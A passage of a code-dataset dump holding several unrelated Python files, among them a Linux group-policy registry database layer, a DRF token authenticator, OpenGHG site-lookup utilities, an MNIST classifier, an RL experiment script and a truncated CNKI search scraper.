self._add(row)\n except Exception as exc:\n (self\n .db_session\n .query(samba_hkcu_preg)\n .filter(samba_hkcu_preg.sid == row.sid)\n .filter(samba_hkcu_preg.hive_key == row.hive_key)\n .update(row.update_fields()))\n self.db_session.commit()\n\n def _shortcut_upsert(self, row):\n try:\n self._add(row)\n except:\n (self\n .db_session\n .query(ad_shortcut)\n .filter(ad_shortcut.sid == row.sid)\n .filter(ad_shortcut.path == row.path)\n .update(row.update_fields()))\n self.db_session.commit()\n\n def _printer_upsert(self, row):\n try:\n self._add(row)\n except:\n (self\n .db_session\n .query(printer_entry)\n .filter(printer_entry.sid == row.sid)\n .filter(printer_entry.name == row.name)\n .update(row.update_fields()))\n self.db_session.commit()\n\n def _drive_upsert(self, row):\n try:\n self._add(row)\n except:\n (self\n .db_session\n .query(drive_entry)\n .filter(drive_entry.sid == row.sid)\n .filter(drive_entry.dir == row.dir)\n .update(row.update_fields()))\n self.db_session.commit()\n\n def set_info(self, name, value):\n ientry = info_entry(name, value)\n logdata = dict()\n logdata['varname'] = name\n logdata['value'] = value\n log('D19', logdata)\n self._info_upsert(ientry)\n\n def _delete_hklm_keyname(self, keyname):\n '''\n Delete PReg hive_key from HKEY_LOCAL_MACHINE\n '''\n logdata = dict({'keyname': keyname})\n try:\n (self\n .db_session\n .query(samba_preg)\n .filter(samba_preg.keyname == keyname)\n .delete(synchronize_session=False))\n self.db_session.commit()\n log('D65', logdata)\n except Exception as exc:\n log('D63', logdata)\n\n def add_hklm_entry(self, preg_entry, policy_name):\n '''\n Write PReg entry to HKEY_LOCAL_MACHINE\n '''\n pentry = samba_preg(preg_entry, policy_name)\n if not pentry.valuename.startswith('**'):\n self._hklm_upsert(pentry)\n else:\n logdata = dict({'key': pentry.hive_key})\n if pentry.valuename.lower() == '**delvals.':\n self._delete_hklm_keyname(pentry.keyname)\n else:\n log('D27', logdata)\n\n def _delete_hkcu_keyname(self, keyname, sid):\n '''\n Delete PReg hive_key from HKEY_CURRENT_USER\n '''\n logdata = dict({'sid': sid, 'keyname': keyname})\n try:\n (self\n .db_session\n .query(samba_hkcu_preg)\n .filter(samba_hkcu_preg.sid == sid)\n .filter(samba_hkcu_preg.keyname == keyname)\n .delete(synchronize_session=False))\n self.db_session.commit()\n log('D66', logdata)\n except:\n log('D64', logdata)\n\n def 
add_hkcu_entry(self, preg_entry, sid, policy_name):\n '''\n Write PReg entry to HKEY_CURRENT_USER\n '''\n hkcu_pentry = samba_hkcu_preg(sid, preg_entry, policy_name)\n logdata = dict({'sid': sid, 'policy': policy_name, 'key': hkcu_pentry.hive_key})\n if not hkcu_pentry.valuename.startswith('**'):\n log('D26', logdata)\n self._hkcu_upsert(hkcu_pentry)\n else:\n if hkcu_pentry.valuename.lower() == '**delvals.':\n self._delete_hkcu_keyname(hkcu_pentry.keyname, sid)\n else:\n log('D51', logdata)\n\n def add_shortcut(self, sid, sc_obj, policy_name):\n '''\n Store shortcut information in the database\n '''\n sc_entry = ad_shortcut(sid, sc_obj, policy_name)\n logdata = dict()\n logdata['link'] = sc_entry.path\n logdata['sid'] = sid\n log('D41', logdata)\n self._shortcut_upsert(sc_entry)\n\n def add_printer(self, sid, pobj, policy_name):\n '''\n Store printer configuration in the database\n '''\n prn_entry = printer_entry(sid, pobj, policy_name)\n logdata = dict()\n logdata['printer'] = prn_entry.name\n logdata['sid'] = sid\n log('D40', logdata)\n self._printer_upsert(prn_entry)\n\n def add_drive(self, sid, dobj, policy_name):\n drv_entry = drive_entry(sid, dobj, policy_name)\n logdata = dict()\n logdata['uri'] = drv_entry.path\n logdata['sid'] = sid\n log('D39', logdata)\n self._drive_upsert(drv_entry)\n\n def add_folder(self, sid, fobj, policy_name):\n fld_entry = folder_entry(sid, fobj, policy_name)\n logdata = dict()\n logdata['folder'] = fld_entry.path\n logdata['sid'] = sid\n log('D42', logdata)\n try:\n self._add(fld_entry)\n except Exception as exc:\n (self\n ._filter_sid_obj(folder_entry, sid)\n .filter(folder_entry.path == fld_entry.path)\n .update(fld_entry.update_fields()))\n self.db_session.commit()\n\n def add_envvar(self, sid, evobj, policy_name):\n ev_entry = envvar_entry(sid, evobj, policy_name)\n logdata = dict()\n logdata['envvar'] = ev_entry.name\n logdata['sid'] = sid\n log('D53', logdata)\n try:\n self._add(ev_entry)\n except Exception as exc:\n (self\n ._filter_sid_obj(envvar_entry, sid)\n .filter(envvar_entry.name == ev_entry.name)\n .update(ev_entry.update_fields()))\n self.db_session.commit()\n def add_script(self, sid, scrobj, policy_name):\n scr_entry = script_entry(sid, scrobj, policy_name)\n logdata = dict()\n logdata['script path'] = scrobj.path\n logdata['sid'] = sid\n log('D153', logdata)\n try:\n self._add(scr_entry)\n except Exception as exc:\n (self\n ._filter_sid_obj(script_entry, sid)\n .filter(script_entry.path == scr_entry.path)\n .update(scr_entry.update_fields()))\n self.db_session.commit()\n\n def add_file(self, sid, fileobj, policy_name):\n f_entry = file_entry(sid, fileobj, policy_name)\n logdata = dict()\n logdata['targetPath'] = f_entry.targetPath\n logdata['fromPath'] = f_entry.fromPath\n log('D162', logdata)\n try:\n self._add(f_entry)\n except Exception as exc:\n (self\n ._filter_sid_obj(file_entry, sid)\n .filter(file_entry.targetPath == f_entry.targetPath)\n .update(f_entry.update_fields()))\n self.db_session.commit()\n\n\n def add_ini(self, sid, iniobj, policy_name):\n inientry = ini_entry(sid, iniobj, policy_name)\n logdata = dict()\n logdata['path'] = inientry.path\n logdata['action'] = inientry.action\n log('D177', logdata)\n try:\n self._add(inientry)\n except Exception as exc:\n (self\n ._filter_sid_obj(ini_entry, sid)\n .filter(ini_entry.path == inientry.path)\n .update(inientry.update_fields()))\n self.db_session.commit()\n\n def add_networkshare(self, sid, networkshareobj, policy_name):\n networkshareentry = networkshare_entry(sid, 
networkshareobj, policy_name)\n logdata = dict()\n logdata['name'] = networkshareentry.name\n logdata['path'] = networkshareentry.path\n logdata['action'] = networkshareentry.action\n log('D186', logdata)\n try:\n self._add(networkshareentry)\n except Exception as exc:\n (self\n ._filter_sid_obj(networkshare_entry, sid)\n .filter(networkshare_entry.path == networkshareentry.path)\n .update(networkshareentry.update_fields()))\n self.db_session.commit()\n\n\n def _filter_sid_obj(self, row_object, sid):\n res = (self\n .db_session\n .query(row_object)\n .filter(row_object.sid == sid))\n return res\n\n def _filter_sid_list(self, row_object, sid):\n res = (self\n .db_session\n .query(row_object)\n .filter(row_object.sid == sid)\n .order_by(row_object.id)\n .all())\n return res\n\n def get_shortcuts(self, sid):\n return self._filter_sid_list(ad_shortcut, sid)\n\n def get_printers(self, sid):\n return self._filter_sid_list(printer_entry, sid)\n\n def get_drives(self, sid):\n return self._filter_sid_list(drive_entry, sid)\n\n def get_folders(self, sid):\n return self._filter_sid_list(folder_entry, sid)\n\n def get_envvars(self, sid):\n return self._filter_sid_list(envvar_entry, sid)\n\n def _filter_scripts_list(self, row_object, sid, action):\n res = (self\n .db_session\n .query(row_object)\n .filter(row_object.sid == sid)\n .filter(row_object.action == action)\n .order_by(row_object.id)\n .all())\n return res\n\n def get_scripts(self, sid, action):\n return self._filter_scripts_list(script_entry, sid, action)\n\n def get_files(self, sid):\n return self._filter_sid_list(file_entry, sid)\n\n def get_networkshare(self, sid):\n return self._filter_sid_list(networkshare_entry, sid)\n\n def get_ini(self, sid):\n return self._filter_sid_list(ini_entry, sid)\n\n def get_hkcu_entry(self, sid, hive_key):\n res = (self\n .db_session\n .query(samba_hkcu_preg)\n .filter(samba_hkcu_preg.sid == sid)\n .filter(samba_hkcu_preg.hive_key == hive_key)\n .first())\n # Try to get the value from machine SID as a default if no option is set.\n if not res:\n machine_sid = self.get_info('machine_sid')\n res = self.db_session.query(samba_hkcu_preg).filter(samba_hkcu_preg.sid == machine_sid).filter(samba_hkcu_preg.hive_key == hive_key).first()\n return res\n\n def filter_hkcu_entries(self, sid, startswith):\n res = (self\n .db_session\n .query(samba_hkcu_preg)\n .filter(samba_hkcu_preg.sid == sid)\n .filter(samba_hkcu_preg.hive_key.like(startswith)))\n return res\n\n def get_info(self, name):\n res = (self\n .db_session\n .query(info_entry)\n .filter(info_entry.name == name)\n .first())\n return res.value\n\n def get_hklm_entry(self, hive_key):\n res = (self\n .db_session\n .query(samba_preg)\n .filter(samba_preg.hive_key == hive_key)\n .first())\n return res\n\n def filter_hklm_entries(self, startswith):\n res = (self\n .db_session\n .query(samba_preg)\n .filter(samba_preg.hive_key.like(startswith)))\n return res\n\n def wipe_user(self, sid):\n self._wipe_sid(samba_hkcu_preg, sid)\n self._wipe_sid(ad_shortcut, sid)\n self._wipe_sid(printer_entry, sid)\n self._wipe_sid(drive_entry, sid)\n self._wipe_sid(script_entry, sid)\n self._wipe_sid(file_entry, sid)\n self._wipe_sid(ini_entry, sid)\n self._wipe_sid(networkshare_entry, sid)\n\n def _wipe_sid(self, row_object, sid):\n (self\n .db_session\n .query(row_object)\n .filter(row_object.sid == sid)\n .delete())\n self.db_session.commit()\n\n def wipe_hklm(self):\n self.db_session.query(samba_preg).delete()\n 
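# commit right away so the bulk delete above is flushed in its own transaction\n 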
self.db_session.commit()\n\n","repo_name":"altlinux/gpupdate","sub_path":"gpoa/storage/sqlite_registry.py","file_name":"sqlite_registry.py","file_ext":"py","file_size_in_byte":20523,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"}
{"seq_id":"33253229432","text":"# Authentication and permissions\nfrom app01.models import UserToken\n\nfrom rest_framework.exceptions import AuthenticationFailed\nfrom rest_framework.authentication import BaseAuthentication\n# We inherit from this Base class because the authenticate_header method has to exist; it is hardly ever used, but it must be there, and inheriting saves us writing it ourselves\n\nclass UserAuth(BaseAuthentication):\n def authenticate(self, request):\n token = request.query_params.get(\"token\")\n usertoken = UserToken.objects.filter(token=token).first()\n if usertoken:\n return usertoken.user,usertoken\n else:\n raise AuthenticationFailed(\"Authentication failed!!!\")","repo_name":"lllmy/drfdemo","sub_path":"DRF/app01/utils/auth_class.py","file_name":"auth_class.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"69947802349","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 24 21:54:52 2020\n\n@author: hihyun\n\"\"\"\n\nnum=int(input())\nc=list(map(int,input().split()))\n\ncount=0\nwhile sorted(c)!=c and len(c)>3:\n c.remove(min(c))\n c.remove(max(c))\n count+=1\nif len(c)==0 or len(c)>3:\n print(count*2)\nelse:\n print(count*2+1)\n","repo_name":"hyeinhyun/alg_prac","sub_path":"boj/7570.py","file_name":"7570.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"23690798698","text":"\"\"\" Utility functions that are used by multiple modules\n\n\"\"\"\nfrom collections.abc import Iterable\nfrom typing import Any, Dict, Iterator, Optional, Tuple\n\n\ndef running_in_cloud() -> bool:\n \"\"\"Are we running in the cloud?\n\n Checks for the OPENGHG_CLOUD environment variable being set\n\n Returns:\n bool: True if running in cloud\n \"\"\"\n from os import environ\n\n cloud_env = environ.get(\"OPENGHG_CLOUD\", \"0\")\n\n return bool(int(cloud_env))\n\n\ndef running_on_hub() -> bool:\n \"\"\"Are we running on the OpenGHG Hub?\n\n Checks for the OPENGHG_HUB environment variable being set\n\n Returns:\n bool: True if running on the hub\n \"\"\"\n from os import environ\n\n hub_env = environ.get(\"OPENGHG_HUB\", \"0\")\n\n return bool(int(hub_env))\n\n\ndef running_locally() -> bool:\n \"\"\"Are we running OpenGHG locally?\n\n Returns:\n bool: True if running locally\n \"\"\"\n return not (running_on_hub() or running_in_cloud())\n\n\ndef unanimous(seq: Dict) -> bool:\n \"\"\"Checks that all values in an iterable object\n are the same\n\n Args:\n seq: Iterable object\n Returns\n bool: True if all values are the same\n\n \"\"\"\n it = iter(seq.values())\n try:\n first = next(it)\n except StopIteration:\n return True\n else:\n return all(i == first for i in it)\n\n\ndef pairwise(iterable: Iterable) -> Iterator[Tuple[Any, Any]]:\n \"\"\"Return a zip of an iterable where a is the iterable\n and b is the iterable advanced one step.\n\n Args:\n iterable: Any iterable type\n Returns:\n tuple: Tuple of iterables\n \"\"\"\n from itertools import tee\n\n a, b = tee(iterable)\n next(b, None)\n\n return zip(a, b)\n\n\ndef site_code_finder(site_name: str) -> Optional[str]:\n \"\"\"Find the site code for a given site name.\n\n Args:\n site_name: Site long name\n Returns:\n str or None: Three letter site code if found\n \"\"\"\n from 
openghg.util import load_json\n from rapidfuzz import process # type: ignore\n\n sites = load_json(\"site_lookup.json\")\n\n inverted = {s[\"short_name\"]: c for c, s in sites.items()}\n\n matches = process.extract(query=site_name, choices=inverted.keys())\n highest_score = matches[0][1]\n\n if highest_score < 90:\n return None\n\n matched_site = matches[0][0]\n site_code: str = inverted[matched_site]\n\n return site_code\n\n\ndef find_matching_site(site_name: str, possible_sites: Dict) -> str:\n \"\"\"Try and find a similar name to site_name in site_list and return a suggestion or\n error string.\n\n Args:\n site_name: Name of site\n site_list: List of sites to check\n Returns:\n str: Suggestion / error message\n \"\"\"\n from rapidfuzz import process\n\n site_list = possible_sites.keys()\n\n matches = process.extract(site_name, site_list)\n\n scores = [s for m, s, _ in matches]\n\n # This seems like a decent cutoff score for a decent find\n cutoff_score = 85\n\n if scores[0] < cutoff_score:\n return f\"No suggestion for {site_name}.\"\n elif scores[0] > cutoff_score and scores[0] > scores[1]:\n best_match = matches[0][0]\n return f\"Did you mean {best_match.upper()}, code: {possible_sites[best_match]} ?\"\n elif scores[0] == scores[1]:\n suggestions = [f\"{match.title()}, code: {possible_sites[match]}\" for match, _, _ in matches]\n nl_char = \"\\n\"\n return f\"Did you mean one of : \\n {nl_char.join(suggestions)}\"\n else:\n return f\"Unknown site: {site_name}\"\n\n\ndef verify_site(site: str) -> str:\n \"\"\"Check if the passed site is a valid one and returns the three\n letter site code if found. Otherwise we use fuzzy text matching to suggest\n sites with similar names.\n\n Args:\n site: Three letter site code or site name\n Returns:\n str: Verified three letter site code if valid site\n \"\"\"\n from openghg.types import InvalidSiteError\n from openghg.util import load_json, remove_punctuation\n\n site_data = load_json(\"site_lookup.json\")\n\n if site.upper() in site_data:\n return site.lower()\n else:\n site = remove_punctuation(site)\n name_lookup: Dict[str, str] = {value[\"short_name\"]: code for code, value in site_data.items()}\n\n try:\n return name_lookup[site].lower()\n except KeyError:\n long_names = {value[\"long_name\"]: code for code, value in site_data.items()}\n message = find_matching_site(site_name=site, possible_sites=long_names)\n raise InvalidSiteError(message)\n\n\ndef multiple_inlets(site: str) -> bool:\n \"\"\"Check if the passed site has more than one inlet\n\n Args:\n site: Three letter site code\n Returns:\n bool: True if multiple inlets\n \"\"\"\n from openghg.util import load_json\n\n site_data = load_json(\"site_info.json\")\n\n site = site.upper()\n network = next(iter(site_data[site]))\n\n try:\n heights = set(site_data[network][\"height\"])\n except KeyError:\n try:\n heights = set(site_data[network][\"height_name\"])\n except KeyError:\n return True\n\n return len(heights) > 1\n","repo_name":"abcj123cour/openghg","sub_path":"openghg/util/_util.py","file_name":"_util.py","file_ext":"py","file_size_in_byte":5112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"3916073392","text":"import argparse\nimport torch\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\nimport classifier\n\ndef main(args):\n input_dim = 28 * 28\n output_dim = 10\n\n transform = 
transforms.Compose([transforms.ToTensor(),\n                                transforms.Normalize((0.1307,), (0.3081,))\n                                ])\n\n    train_set = datasets.MNIST(\n        root='./data', train=True, download=True, transform=transform\n    )\n\n    val_set = datasets.MNIST(\n        root='./data', train=False, download=True, transform=transform\n    )\n\n    train_loader = torch.utils.data.DataLoader(train_set, batch_size=args.batch_size, shuffle=True)\n    val_loader = torch.utils.data.DataLoader(val_set, batch_size=len(val_set), shuffle=False)\n\n    linear_model = classifier.LinearClassifier(input_dim, output_dim)\n\n    criterion = nn.CrossEntropyLoss()\n    optimizer = optim.SGD(linear_model.parameters(), lr=args.lr, momentum=args.momentum)\n\n    for epoch in range(args.n_epochs):\n        running_loss = 0.0\n        for i, data in enumerate(train_loader, 0):\n            # get the inputs; data is a list of [inputs, labels]\n            inputs, labels = data\n\n            inputs = Variable(inputs.view(-1, input_dim))\n            labels = Variable(labels)\n\n            # zero the parameter gradients\n            optimizer.zero_grad()\n            outputs = linear_model(inputs)\n            loss = criterion(outputs, labels)\n            loss.backward()\n            optimizer.step()\n\n            # print statistics\n            running_loss += loss.item()\n\n            '''\n            if i % 100 == 99:    # print every 100 mini-batches\n                print('[%d, %5d] loss: %.3f' %\n                      (epoch + 1, i + 1, running_loss / 100))\n                running_loss = 0.\n            '''\n\n        else:\n            '''\n            print('[%d, %5d] loss: %.3f' %\n                  (epoch + 1, i, running_loss / (i % 100)))\n            '''\n\n    linear_model.eval()\n\n    with torch.no_grad():\n        val_loss = 0.0\n        val_corrects = 0\n        for i, data in enumerate(val_loader, 0):\n            inputs, labels = data\n\n            inputs = Variable(inputs.view(-1, input_dim))\n            labels = Variable(labels)\n\n            outputs = linear_model(inputs)\n            _, preds = torch.max(outputs, 1)\n            loss = criterion(outputs, labels)\n            val_loss += criterion(outputs, labels).item()  # sum up batch loss\n            val_corrects += torch.sum(preds == labels.data)\n\n            # pred = output.argmax(dim=1, keepdim=True)  # get the index of the max log-probability\n            # correct += pred.eq(target.view_as(pred)).sum().item()\n\n        epoch_loss = val_loss / (i + 1)\n        epoch_acc = val_corrects.double() / len(val_set)\n\n        print('{} Loss: {:.4f} Acc: {:.4f}'.format(\n            'val', epoch_loss, epoch_acc))\n\n\n\n\n    print('Finished Training')\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='PyTorch MNIST')\n    parser.add_argument('--batch_size', type=int, default=128, metavar='N',\n                        help='input batch size for training (default: 128)')\n    parser.add_argument('--n_epochs', type=int, default=10, metavar='N',\n                        help='number of epochs to train (default: 10)')\n    parser.add_argument('--lr', type=float, default=0.001, metavar='LR',\n                        help='learning rate (default: 0.001)')\n    parser.add_argument('--momentum', type=float, default=0.9, metavar='M',\n                        help='momentum (default: 0.9)')\n    parser.add_argument('--seed', type=int, default=1, metavar='S',\n                        help='random seed (default: 1)')\n    parser.add_argument('--save-model', action='store_true', default=True,\n                        help='For Saving the current Model')\n    args = parser.parse_args()\n\n    main(args)\n\n","repo_name":"ozctimoti/MNIST_Convolution","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39310194926","text":"import sys\nimport os\nimport numpy as np\nfrom matplotlib import pyplot as plt\nsource_path = os.path.join(\"source/\")\nsys.path.insert(0,source_path)\nimport excursions  # pylint: disable = import-error\nimport algorithms  # pylint: disable = 
import-error\nimport tables # pylint: disable = import-error\n\nenvironment_parameters = dict(\n\ttrajectory_length = 100, \n\tpositivity_bias = 5,\n\ttarget_bias = 7,\n)\n\ngauge = excursions.gauge(environment_parameters)\nprint(gauge.max_return)\nprint(gauge.max_ent_return)\nprint()\n\nenvironment = excursions.environment(environment_parameters)\nsuccess_learning_rate = 0.003\nentropy_learning_rate = 0.01\nanalyser1 = excursions.analysis(success_learning_rate, entropy_learning_rate)\nanalyser2 = excursions.analysis(success_learning_rate, entropy_learning_rate)\nanalyser3 = excursions.analysis(success_learning_rate, entropy_learning_rate)\n\ntable_dimension = (environment_parameters['trajectory_length']*2 + 1, \n\t\t\t\t environment_parameters['trajectory_length'] + 1)\npolicy1 = tables.two_action_policy_table(table_dimension, 0.05)\nvalues2 = tables.value_table(table_dimension, 0.3)\npolicy2 = tables.two_action_policy_table(table_dimension, 0.05)\nvalues3 = tables.value_table(table_dimension, 0.3)\npolicy3 = tables.two_action_policy_table(table_dimension, 0.15)\n\nalgorithm_parameters1 = dict(\n\tenvironment = environment, \n\treturn_learning_rate = 0.1,\n\tpolicy = policy1,\n\tanalyser = analyser1,\n)\nalgorithm_parameters2 = dict(\n\tenvironment = environment, \n\treturn_learning_rate = 0.1,\n\tvalues = values2,\n\tpolicy = policy2,\n\tanalyser = analyser2,\n)\nalgorithm_parameters3 = dict(\n\tenvironment = environment, \n\treturn_learning_rate = 0.1,\n\tvalues = values3,\n\tpolicy = policy3,\n\tanalyser = analyser3,\n)\nagent1 = algorithms.kl_regularized_monte_carlo_returns(algorithm_parameters1)\nagent2 = algorithms.kl_regularized_monte_carlo_value_baseline(algorithm_parameters2)\nagent3 = algorithms.kl_regularized_actor_critic(algorithm_parameters3)\n\n\nagent1.evaluate(10000)\ninitial_return = agent1.average_return\ninitial_success = agent1.analyser.average_success\ninitial_entropy = agent1.analyser.average_entropy\nagent2.average_return = initial_return\nagent3.average_return = initial_return\nagent2.analyser.average_success = initial_success\nagent3.analyser.average_success = initial_success\nagent2.analyser.average_entropy = initial_entropy\nagent3.analyser.average_entropy = initial_entropy\nprint(\"Initial return: %s\"%(initial_return))\ninitial_samples = agent1.samples(50)\n\nmin_y = np.min(np.array(initial_samples)[:,:,0]) - 1\nmax_y = np.max(np.array(initial_samples)[:,:,0]) + 1\n\nepisodes = 20000\nagent1.train(episodes)\nagent2.train(episodes)\nagent3.train(episodes)\n\nevals = 1000\nagent1.evaluate(evals)\nagent2.evaluate(evals)\nagent3.evaluate(evals)\nfinal_return1 = agent1.average_return\nfinal_return2 = agent2.average_return\nfinal_return3 = agent3.average_return\nprint(\"Initial return: %s, agent1's final return: %s, agent2's final return: %s, agent3's final return: %s\"\n%(initial_return, final_return1, final_return2, final_return3))\nsamples1 = agent1.samples(50)\nsamples2 = agent2.samples(50)\nsamples3 = agent3.samples(50)\n\ntraj_len = environment_parameters['trajectory_length']\nplot_end = traj_len + 1\n\nup_probabilities1 = 1/(1+np.exp(-agent1.policy.table))\nstate_probabilities1 = excursions.state_probabilities(up_probabilities1, traj_len)\nup_probabilities2 = 1/(1+np.exp(-agent2.policy.table))\nstate_probabilities2 = excursions.state_probabilities(up_probabilities2, traj_len)\nup_probabilities3 = 1/(1+np.exp(-agent3.policy.table))\nstate_probabilities3 = excursions.state_probabilities(up_probabilities3, traj_len)\n\ninitial_data = 
[np.array(initial_samples)[:,:,0].T,\n\t\t\t\tinitial_return,\n\t\t\t\tinitial_success,\n\t\t\t\tinitial_entropy]\nagent1_data = [agent1.returns, \n\t\t\t agent1.average_returns, \n\t\t\t agent1.analyser.successes, \n\t\t\t agent1.analyser.entropies,\n\t\t\t np.array(samples1)[:,:,0].T,\n\t\t\t agent1.policy.table,\n\t\t\t state_probabilities1,\n\t\t\t final_return1,\n\t\t\t agent1.analyser.average_success,\n\t\t\t agent1.analyser.average_entropy]\nagent2_data = [agent2.returns, \n\t\t\t agent2.average_returns, \n\t\t\t agent2.analyser.successes, \n\t\t\t agent2.analyser.entropies,\n\t\t\t np.array(samples2)[:,:,0].T,\n\t\t\t agent2.policy.table,\n\t\t\t state_probabilities2,\n\t\t\t final_return2,\n\t\t\t agent2.analyser.average_success,\n\t\t\t agent2.analyser.average_entropy,\n\t\t\t agent2.values.table]\nagent3_data = [agent3.returns, \n\t\t\t agent3.average_returns, \n\t\t\t agent3.analyser.successes, \n\t\t\t agent3.analyser.entropies,\n\t\t\t np.array(samples3)[:,:,0].T,\n\t\t\t agent3.policy.table,\n\t\t\t state_probabilities3,\n\t\t\t final_return3,\n\t\t\t agent3.analyser.average_success,\n\t\t\t agent3.analyser.average_entropy,\n\t\t\t agent3.values.table]\n\nsave_initial = False\nif save_initial:\n\tinitial_name = (\"data/tl%s_pb%s_tb%s_data\"%(\n\t\tenvironment_parameters['trajectory_length'],\n\t\tenvironment_parameters['positivity_bias'],\n\t\tenvironment_parameters['target_bias']))\n\tnp.save(initial_name, initial_data)\n\nsave = False\nif save:\n\tshared_name = (\"data/tl%s_pb%s_tb%s_rl%s_sl%s_el%s\"%(\n\t\tenvironment_parameters['trajectory_length'],\n\t\tenvironment_parameters['positivity_bias'],\n\t\tenvironment_parameters['target_bias'],\n\t\talgorithm_parameters1['return_learning_rate'],\n\t\tsuccess_learning_rate,\n\t\tentropy_learning_rate))\n\tagent1_name = (\"_%spl_%sAlg_\"%(\n\t\tagent1.policy.learning_rate,\n\t\t'mc'))\n\tagent2_name = (\"_%spl_%svl_%sAlg_\"%(\n\t\tagent2.policy.learning_rate,\n\t\tagent2.values.learning_rate,\n\t\t'mcvb'))\n\tagent3_name = (\"_%spl_%svl_%sAlg_\"%(\n\t\tagent3.policy.learning_rate,\n\t\tagent3.values.learning_rate,\n\t\t'ac'))\n\tnp.save(shared_name + agent1_name + \"data\", agent1_data)\n\tnp.save(shared_name + agent2_name + \"data\", agent2_data)\n\tnp.save(shared_name + agent3_name + \"data\", agent3_data)\n\nplt.figure(figsize = (12, 9.5))\n\nplt.subplot(331)\nplt.plot(agent3.average_returns, c = 'g')\nplt.plot(agent1.average_returns, c = 'b')\nplt.plot(agent2.average_returns, c = 'm')\nplt.xlabel(\"Episode\")\nplt.ylabel(\"Running return\")\n\nplt.subplot(332)\nplt.plot(agent3.analyser.successes, c = 'g')\nplt.plot(agent1.analyser.successes, c = 'b')\nplt.plot(agent2.analyser.successes, c = 'm')\nplt.xlabel(\"Episode\")\nplt.ylabel(\"Successes\")\n\nplt.subplot(333)\nplt.plot(agent3.analyser.entropies, c = 'g')\nplt.plot(agent1.analyser.entropies, c = 'b')\nplt.plot(agent2.analyser.entropies, c = 'm')\nplt.xlabel(\"Episode\")\nplt.ylabel(\"Entropy\")\n\nplt.subplot(334)\nplt.plot(np.array(initial_samples)[:,:,0].T, c = 'k', alpha = 0.2)\nplt.plot(np.array(samples1)[:,:,0].T, c = 'b', alpha = 0.2)\nplt.scatter([environment_parameters['trajectory_length']], \n\t\t\t[0], c = 'k', marker = 'o', s = 80)\nplt.plot([-1, plot_end], [0, 0], lw = 2, c = 'r', ls = '--', alpha = 0.3)\nplt.fill_between([-1, plot_end], [0, 0], [min_y, min_y], color = 'r', alpha = 0.1)\nplt.xlim(-1, plot_end)\nplt.ylim(min_y, max_y)\nplt.title(\"Agent 
1\")\nplt.xlabel(\"Time\")\nplt.ylabel(\"Position\")\n\nplt.subplot(335)\nplt.plot(np.array(initial_samples)[:,:,0].T, c = 'k', alpha = 0.2)\nplt.plot(np.array(samples2)[:,:,0].T, c = 'm', alpha = 0.2)\nplt.scatter([environment_parameters['trajectory_length']], \n\t\t\t[0], c = 'k', marker = 'o', s = 80)\nplt.plot([-1, plot_end], [0, 0], lw = 2, c = 'r', ls = '--', alpha = 0.3)\nplt.fill_between([-1, plot_end], [0, 0], [min_y, min_y], color = 'r', alpha = 0.1)\nplt.xlim(-1, plot_end)\nplt.ylim(min_y, max_y)\nplt.title(\"Agent 2\")\nplt.xlabel(\"Time\")\n\nplt.subplot(336)\nplt.plot(np.array(initial_samples)[:,:,0].T, c = 'k', alpha = 0.2)\nplt.plot(np.array(samples3)[:,:,0].T, c = 'g', alpha = 0.2)\nplt.scatter([environment_parameters['trajectory_length']], \n\t\t\t[0], c = 'k', marker = 'o', s = 80)\nplt.plot([-1, plot_end], [0, 0], lw = 2, c = 'r', ls = '--', alpha = 0.3)\nplt.fill_between([-1, plot_end], [0, 0], [min_y, min_y], color = 'r', alpha = 0.1)\nplt.xlim(-1, plot_end)\nplt.ylim(min_y, max_y)\nplt.title(\"Agent 3\")\nplt.xlabel(\"Time\")\n\n\"\"\"\nplt.subplot(337)\nplt.pcolor(np.concatenate((up_probabilities3[traj_len + 1 : 2*traj_len + 1],\n\t\t\t\t\t\t up_probabilities3[0 : traj_len + 1])))\nplt.colorbar()\n\nplt.subplot(338)\nplt.pcolor(state_probabilities3)\nplt.colorbar()\n\nplt.subplot(339)\nplt.pcolor(np.concatenate((agent3.values.table[traj_len + 1 : 2*traj_len + 1],\n\t\t\t\t\t\t agent3.values.table[0 : traj_len + 1])))\nplt.colorbar()\n\"\"\"\n\nplt.show()","repo_name":"JamieMair/rledts","sub_path":"tabular_excursions/excursion_data.py","file_name":"excursion_data.py","file_ext":"py","file_size_in_byte":8297,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"26189542228","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.common.exceptions import TimeoutException\r\nimport time\r\nfrom pyquery import PyQuery as pq\r\nimport os\r\nimport csv\r\n\r\nuser_input = str(input('请输入要检索的关键词:\\n'))\r\nMAX_PAGE = 17\r\nbrowser = webdriver.PhantomJS()\r\nwait = WebDriverWait(browser, 6)\r\nurl = 'https://kns.cnki.net/kns/brief/default_result.aspx'\r\nbrowser.get(url)\r\ninput = wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, 'div.research input')))\r\ninput.send_keys(user_input)\r\ninput.send_keys(Keys.ENTER)\r\nbrowser.switch_to.frame('iframeResult')\r\ndef get_index_page(page):\r\n print('正在爬取%d页'%(page))\r\n if page>1:\r\n try:\r\n next = wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR,'div.TitleLeftCell a:last-child')))\r\n next.click()\r\n except TimeoutException:\r\n get_index_page(page)\r\n wait.until(EC.text_to_be_present_in_element((By.CSS_SELECTOR, 'div.TitleLeftCell font.Mark'), str(page)))\r\n parse_page(page)\r\ndef parse_page(page):\r\n html = browser.page_source\r\n doc = pq(html)\r\n # 一个生成器\r\n 